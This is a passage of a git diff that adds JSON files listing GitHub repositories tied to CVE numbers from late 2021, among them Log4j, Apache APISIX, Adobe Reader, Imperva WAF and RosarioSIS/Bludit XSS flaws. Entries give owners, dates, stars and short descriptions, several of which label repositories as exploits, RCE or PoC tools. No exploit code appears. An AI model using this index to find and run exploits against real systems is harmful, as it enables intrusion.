+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 798066923,
+ "name": "CyberSecurity_CVE-2021-45046",
+ "full_name": "shaily29-eng\/CyberSecurity_CVE-2021-45046",
+ "owner": {
+ "login": "shaily29-eng",
+ "id": 59019087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59019087?v=4",
+ "html_url": "https:\/\/github.com\/shaily29-eng"
+ },
+ "html_url": "https:\/\/github.com\/shaily29-eng\/CyberSecurity_CVE-2021-45046",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-09T03:04:17Z",
+ "updated_at": "2024-05-21T23:30:09Z",
+ "pushed_at": "2024-05-21T23:30:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45067.json b/2021/CVE-2021-45067.json
new file mode 100644
index 0000000000..5249992e21
--- /dev/null
+++ b/2021/CVE-2021-45067.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 550985084,
+ "name": "CVE-2021-45067",
+ "full_name": "hacksysteam\/CVE-2021-45067",
+ "owner": {
+ "login": "hacksysteam",
+ "id": 4098538,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4098538?v=4",
+ "html_url": "https:\/\/github.com\/hacksysteam"
+ },
+ "html_url": "https:\/\/github.com\/hacksysteam\/CVE-2021-45067",
+ "description": "Adobe Reader DC Information Leak Exploit ",
+ "fork": false,
+ "created_at": "2022-10-13T16:42:10Z",
+ "updated_at": "2024-06-20T01:01:23Z",
+ "pushed_at": "2022-10-13T17:00:50Z",
+ "stargazers_count": 23,
+ "watchers_count": 23,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "adobe-reader",
+ "aslr-bypass",
+ "exploit",
+ "info-leak",
+ "out-of-bounds"
+ ],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 23,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45105.json b/2021/CVE-2021-45105.json
new file mode 100644
index 0000000000..6d0302ed85
--- /dev/null
+++ b/2021/CVE-2021-45105.json
@@ -0,0 +1,278 @@
+[
+ {
+ "id": 439614690,
+ "name": "Log4j_dos_CVE-2021-45105",
+ "full_name": "cckuailong\/Log4j_dos_CVE-2021-45105",
+ "owner": {
+ "login": "cckuailong",
+ "id": 10824150,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10824150?v=4",
+ "html_url": "https:\/\/github.com\/cckuailong"
+ },
+ "html_url": "https:\/\/github.com\/cckuailong\/Log4j_dos_CVE-2021-45105",
+ "description": "Log4j_dos_CVE-2021-45105",
+ "fork": false,
+ "created_at": "2021-12-18T12:54:44Z",
+ "updated_at": "2023-01-18T06:57:11Z",
+ "pushed_at": "2021-12-19T01:59:52Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 439635017,
+ "name": "log4j2-CVE-2021-45105",
+ "full_name": "pravin-pp\/log4j2-CVE-2021-45105",
+ "owner": {
+ "login": "pravin-pp",
+ "id": 12995541,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12995541?v=4",
+ "html_url": "https:\/\/github.com\/pravin-pp"
+ },
+ "html_url": "https:\/\/github.com\/pravin-pp\/log4j2-CVE-2021-45105",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-18T14:24:46Z",
+ "updated_at": "2021-12-20T02:29:56Z",
+ "pushed_at": "2021-12-18T14:34:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 439989822,
+ "name": "CVE-2021-45105",
+ "full_name": "tejas-nagchandi\/CVE-2021-45105",
+ "owner": {
+ "login": "tejas-nagchandi",
+ "id": 76960497,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76960497?v=4",
+ "html_url": "https:\/\/github.com\/tejas-nagchandi"
+ },
+ "html_url": "https:\/\/github.com\/tejas-nagchandi\/CVE-2021-45105",
+ "description": "Replicating CVE-2021-45105",
+ "fork": false,
+ "created_at": "2021-12-19T23:22:25Z",
+ "updated_at": "2021-12-19T23:50:00Z",
+ "pushed_at": "2021-12-20T00:49:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-45105",
+ "log4j2"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 440136050,
+ "name": "log4j2_dos_exploit",
+ "full_name": "iAmSOScArEd\/log4j2_dos_exploit",
+ "owner": {
+ "login": "iAmSOScArEd",
+ "id": 34957454,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34957454?v=4",
+ "html_url": "https:\/\/github.com\/iAmSOScArEd"
+ },
+ "html_url": "https:\/\/github.com\/iAmSOScArEd\/log4j2_dos_exploit",
+ "description": "log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc",
+ "fork": false,
+ "created_at": "2021-12-20T10:52:20Z",
+ "updated_at": "2022-08-13T07:08:57Z",
+ "pushed_at": "2021-12-22T02:37:35Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 441161290,
+ "name": "https-github.com-pravin-pp-log4j2-CVE-2021-45105",
+ "full_name": "dileepdkumar\/https-github.com-pravin-pp-log4j2-CVE-2021-45105",
+ "owner": {
+ "login": "dileepdkumar",
+ "id": 89115244,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89115244?v=4",
+ "html_url": "https:\/\/github.com\/dileepdkumar"
+ },
+ "html_url": "https:\/\/github.com\/dileepdkumar\/https-github.com-pravin-pp-log4j2-CVE-2021-45105",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-23T11:38:32Z",
+ "updated_at": "2021-12-23T11:38:32Z",
+ "pushed_at": "2021-12-23T11:38:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 441161826,
+ "name": "https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105",
+ "full_name": "dileepdkumar\/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105",
+ "owner": {
+ "login": "dileepdkumar",
+ "id": 89115244,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89115244?v=4",
+ "html_url": "https:\/\/github.com\/dileepdkumar"
+ },
+ "html_url": "https:\/\/github.com\/dileepdkumar\/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-23T11:40:49Z",
+ "updated_at": "2021-12-23T11:40:49Z",
+ "pushed_at": "2021-12-23T11:40:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 441161964,
+ "name": "https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105-v",
+ "full_name": "dileepdkumar\/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105-v",
+ "owner": {
+ "login": "dileepdkumar",
+ "id": 89115244,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89115244?v=4",
+ "html_url": "https:\/\/github.com\/dileepdkumar"
+ },
+ "html_url": "https:\/\/github.com\/dileepdkumar\/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105-v",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-23T11:41:25Z",
+ "updated_at": "2021-12-23T11:41:25Z",
+ "pushed_at": "2021-12-23T11:41:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 441255469,
+ "name": "https-github.com-pravin-pp-log4j2-CVE-2021-45105-1",
+ "full_name": "dileepdkumar\/https-github.com-pravin-pp-log4j2-CVE-2021-45105-1",
+ "owner": {
+ "login": "dileepdkumar",
+ "id": 89115244,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89115244?v=4",
+ "html_url": "https:\/\/github.com\/dileepdkumar"
+ },
+ "html_url": "https:\/\/github.com\/dileepdkumar\/https-github.com-pravin-pp-log4j2-CVE-2021-45105-1",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-23T17:46:02Z",
+ "updated_at": "2021-12-23T17:46:14Z",
+ "pushed_at": "2021-12-23T17:46:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 441302422,
+ "name": "log4j-remediation",
+ "full_name": "sakuraji-labs\/log4j-remediation",
+ "owner": {
+ "login": "sakuraji-labs",
+ "id": 94646260,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94646260?v=4",
+ "html_url": "https:\/\/github.com\/sakuraji-labs"
+ },
+ "html_url": "https:\/\/github.com\/sakuraji-labs\/log4j-remediation",
+ "description": "Discover and remediate Log4Shell vulnerability [CVE-2021-45105]",
+ "fork": false,
+ "created_at": "2021-12-23T21:45:42Z",
+ "updated_at": "2021-12-28T20:16:33Z",
+ "pushed_at": "2021-12-24T00:56:20Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "log4j",
+ "log4j-scanner"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45232.json b/2021/CVE-2021-45232.json
new file mode 100644
index 0000000000..9ac3f00eea
--- /dev/null
+++ b/2021/CVE-2021-45232.json
@@ -0,0 +1,395 @@
+[
+ {
+ "id": 442444055,
+ "name": "westone-CVE-2021-45232-scanner",
+ "full_name": "Osyanina\/westone-CVE-2021-45232-scanner",
+ "owner": {
+ "login": "Osyanina",
+ "id": 78467376,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4",
+ "html_url": "https:\/\/github.com\/Osyanina"
+ },
+ "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2021-45232-scanner",
+ "description": "A vulnerability scanner that detects CVE-2021-45232 vulnerabilities.",
+ "fork": false,
+ "created_at": "2021-12-28T11:36:38Z",
+ "updated_at": "2021-12-28T11:39:20Z",
+ "pushed_at": "2021-12-28T11:40:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 442466781,
+ "name": "CVE-2021-45232-POC",
+ "full_name": "badboycxcc\/CVE-2021-45232-POC",
+ "owner": {
+ "login": "badboycxcc",
+ "id": 72059221,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72059221?v=4",
+ "html_url": "https:\/\/github.com\/badboycxcc"
+ },
+ "html_url": "https:\/\/github.com\/badboycxcc\/CVE-2021-45232-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-28T13:08:34Z",
+ "updated_at": "2021-12-28T14:37:33Z",
+ "pushed_at": "2021-12-28T14:37:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 442543099,
+ "name": "CVE-2021-45232",
+ "full_name": "LTiDi2000\/CVE-2021-45232",
+ "owner": {
+ "login": "LTiDi2000",
+ "id": 68416745,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68416745?v=4",
+ "html_url": "https:\/\/github.com\/LTiDi2000"
+ },
+ "html_url": "https:\/\/github.com\/LTiDi2000\/CVE-2021-45232",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-28T17:56:59Z",
+ "updated_at": "2021-12-29T17:51:59Z",
+ "pushed_at": "2021-12-28T13:30:29Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 442623106,
+ "name": "cve-2021-45232",
+ "full_name": "Ilovewomen\/cve-2021-45232",
+ "owner": {
+ "login": "Ilovewomen",
+ "id": 90023952,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90023952?v=4",
+ "html_url": "https:\/\/github.com\/Ilovewomen"
+ },
+ "html_url": "https:\/\/github.com\/Ilovewomen\/cve-2021-45232",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-29T01:01:16Z",
+ "updated_at": "2023-08-04T05:22:51Z",
+ "pushed_at": "2021-12-29T02:22:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 442640537,
+ "name": "CVE-2021-45232-RCE",
+ "full_name": "jxpsx\/CVE-2021-45232-RCE",
+ "owner": {
+ "login": "jxpsx",
+ "id": 41709132,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41709132?v=4",
+ "html_url": "https:\/\/github.com\/jxpsx"
+ },
+ "html_url": "https:\/\/github.com\/jxpsx\/CVE-2021-45232-RCE",
+ "description": "CVE-2021-45232 RCE",
+ "fork": false,
+ "created_at": "2021-12-29T02:41:11Z",
+ "updated_at": "2021-12-29T02:41:12Z",
+ "pushed_at": "2021-12-28T13:59:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 442695651,
+ "name": "cve-2021-45232-exp",
+ "full_name": "wuppp\/cve-2021-45232-exp",
+ "owner": {
+ "login": "wuppp",
+ "id": 16035650,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16035650?v=4",
+ "html_url": "https:\/\/github.com\/wuppp"
+ },
+ "html_url": "https:\/\/github.com\/wuppp\/cve-2021-45232-exp",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-29T07:32:30Z",
+ "updated_at": "2024-06-23T08:38:08Z",
+ "pushed_at": "2021-12-31T08:30:33Z",
+ "stargazers_count": 79,
+ "watchers_count": 79,
+ "has_discussions": false,
+ "forks_count": 31,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apisix",
+ "cve-2021-45232"
+ ],
+ "visibility": "public",
+ "forks": 31,
+ "watchers": 79,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 442931709,
+ "name": "CVE-2021-45232",
+ "full_name": "dskho\/CVE-2021-45232",
+ "owner": {
+ "login": "dskho",
+ "id": 32945923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32945923?v=4",
+ "html_url": "https:\/\/github.com\/dskho"
+ },
+ "html_url": "https:\/\/github.com\/dskho\/CVE-2021-45232",
+ "description": "CVE-2021-45232 POC",
+ "fork": false,
+ "created_at": "2021-12-30T01:14:40Z",
+ "updated_at": "2022-09-01T02:03:06Z",
+ "pushed_at": "2021-12-29T05:51:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 444081415,
+ "name": "-cve-2021-45232",
+ "full_name": "xiju2003\/-cve-2021-45232",
+ "owner": {
+ "login": "xiju2003",
+ "id": 17631407,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17631407?v=4",
+ "html_url": "https:\/\/github.com\/xiju2003"
+ },
+ "html_url": "https:\/\/github.com\/xiju2003\/-cve-2021-45232",
+ "description": "The vulnerability affects Apache APISIX Dashboard version 2.10.1",
+ "fork": false,
+ "created_at": "2022-01-03T14:01:32Z",
+ "updated_at": "2022-01-03T14:01:33Z",
+ "pushed_at": "2022-01-01T20:22:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 444659919,
+ "name": "CVE-2021-45232-RCE",
+ "full_name": "GYLQ\/CVE-2021-45232-RCE",
+ "owner": {
+ "login": "GYLQ",
+ "id": 15842234,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15842234?v=4",
+ "html_url": "https:\/\/github.com\/GYLQ"
+ },
+ "html_url": "https:\/\/github.com\/GYLQ\/CVE-2021-45232-RCE",
+ "description": "CVE-2021-45232-RCE-多线程批量漏洞检测",
+ "fork": false,
+ "created_at": "2022-01-05T04:13:10Z",
+ "updated_at": "2024-06-08T05:15:45Z",
+ "pushed_at": "2022-01-13T05:12:49Z",
+ "stargazers_count": 36,
+ "watchers_count": 36,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 36,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 444735399,
+ "name": "CVE-2021-45232-RCE",
+ "full_name": "fany0r\/CVE-2021-45232-RCE",
+ "owner": {
+ "login": "fany0r",
+ "id": 29101894,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29101894?v=4",
+ "html_url": "https:\/\/github.com\/fany0r"
+ },
+ "html_url": "https:\/\/github.com\/fany0r\/CVE-2021-45232-RCE",
+ "description": "CVE-2021-45232-RCE",
+ "fork": false,
+ "created_at": "2022-01-05T09:07:35Z",
+ "updated_at": "2022-04-25T19:41:35Z",
+ "pushed_at": "2023-06-24T08:52:41Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 445756387,
+ "name": "Demo",
+ "full_name": "yggcwhat\/Demo",
+ "owner": {
+ "login": "yggcwhat",
+ "id": 91769835,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91769835?v=4",
+ "html_url": "https:\/\/github.com\/yggcwhat"
+ },
+ "html_url": "https:\/\/github.com\/yggcwhat\/Demo",
+ "description": "CVE-2021-45232批量一键检测",
+ "fork": false,
+ "created_at": "2022-01-08T07:42:43Z",
+ "updated_at": "2022-01-08T07:42:43Z",
+ "pushed_at": "2022-01-08T07:42:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 445762780,
+ "name": "CVE-2021-45232",
+ "full_name": "yggcwhat\/CVE-2021-45232",
+ "owner": {
+ "login": "yggcwhat",
+ "id": 91769835,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91769835?v=4",
+ "html_url": "https:\/\/github.com\/yggcwhat"
+ },
+ "html_url": "https:\/\/github.com\/yggcwhat\/CVE-2021-45232",
+ "description": "一键批量检测poc",
+ "fork": false,
+ "created_at": "2022-01-08T08:16:06Z",
+ "updated_at": "2022-01-08T08:28:20Z",
+ "pushed_at": "2022-01-08T08:27:19Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 490272524,
+ "name": "Apisix_Crack",
+ "full_name": "YutuSec\/Apisix_Crack",
+ "owner": {
+ "login": "YutuSec",
+ "id": 41934714,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41934714?v=4",
+ "html_url": "https:\/\/github.com\/YutuSec"
+ },
+ "html_url": "https:\/\/github.com\/YutuSec\/Apisix_Crack",
+ "description": "Apisix系列漏洞:未授权漏洞(CVE-2021-45232)、默认秘钥(CVE-2020-13945)批量探测。",
+ "fork": false,
+ "created_at": "2022-05-09T12:26:11Z",
+ "updated_at": "2024-02-25T02:01:05Z",
+ "pushed_at": "2022-05-09T12:32:43Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45416.json b/2021/CVE-2021-45416.json
new file mode 100644
index 0000000000..8a309e4c86
--- /dev/null
+++ b/2021/CVE-2021-45416.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 452799854,
+ "name": "CVE-2021-45416",
+ "full_name": "86x\/CVE-2021-45416",
+ "owner": {
+ "login": "86x",
+ "id": 75100597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75100597?v=4",
+ "html_url": "https:\/\/github.com\/86x"
+ },
+ "html_url": "https:\/\/github.com\/86x\/CVE-2021-45416",
+ "description": "Reflected Cross-site scripting (XSS) vulnerability in RosarioSIS 8.2.1 allows attackers to inject arbitrary HTML via the search_term parameter in the modules\/Scheduling\/Courses.php script.",
+ "fork": false,
+ "created_at": "2022-01-27T18:34:00Z",
+ "updated_at": "2023-06-12T07:19:17Z",
+ "pushed_at": "2022-02-01T16:07:01Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 459058671,
+ "name": "CVE-2021-45416",
+ "full_name": "dnr6419\/CVE-2021-45416",
+ "owner": {
+ "login": "dnr6419",
+ "id": 43310843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43310843?v=4",
+ "html_url": "https:\/\/github.com\/dnr6419"
+ },
+ "html_url": "https:\/\/github.com\/dnr6419\/CVE-2021-45416",
+ "description": "Stored XSS Vulnerability on RosarioSIS 8.2.1",
+ "fork": false,
+ "created_at": "2022-02-14T07:31:01Z",
+ "updated_at": "2022-02-14T07:34:41Z",
+ "pushed_at": "2022-02-16T08:03:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45468.json b/2021/CVE-2021-45468.json
new file mode 100644
index 0000000000..59be034e19
--- /dev/null
+++ b/2021/CVE-2021-45468.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 437462281,
+ "name": "Imperva_gzip_bypass",
+ "full_name": "0xhaggis\/Imperva_gzip_bypass",
+ "owner": {
+ "login": "0xhaggis",
+ "id": 6735009,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6735009?v=4",
+ "html_url": "https:\/\/github.com\/0xhaggis"
+ },
+ "html_url": "https:\/\/github.com\/0xhaggis\/Imperva_gzip_bypass",
+ "description": "Exploit for CVE-2021-45468, an Imperva WAF bypass.",
+ "fork": false,
+ "created_at": "2021-12-12T05:36:46Z",
+ "updated_at": "2024-04-02T09:29:30Z",
+ "pushed_at": "2021-12-21T21:03:08Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45485.json b/2021/CVE-2021-45485.json
new file mode 100644
index 0000000000..d55970373b
--- /dev/null
+++ b/2021/CVE-2021-45485.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 486493337,
+ "name": "linux-4.19.72_CVE-2021-45485",
+ "full_name": "Satheesh575555\/linux-4.19.72_CVE-2021-45485",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/linux-4.19.72_CVE-2021-45485",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-28T07:38:04Z",
+ "updated_at": "2023-03-08T01:46:06Z",
+ "pushed_at": "2022-04-28T07:40:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45744.json b/2021/CVE-2021-45744.json
new file mode 100644
index 0000000000..0f64d269e0
--- /dev/null
+++ b/2021/CVE-2021-45744.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 439930586,
+ "name": "Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS",
+ "full_name": "plsanu\/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS",
+ "description": "CVE-2021-45744 - A Stored Cross Site Scripting (XSS) vulnerability exists in bludit 3.13.1 via the TAGS section in login panel. Application stores attacker injected dangerous JavaScript in to the database and executes without validating.",
+ "fork": false,
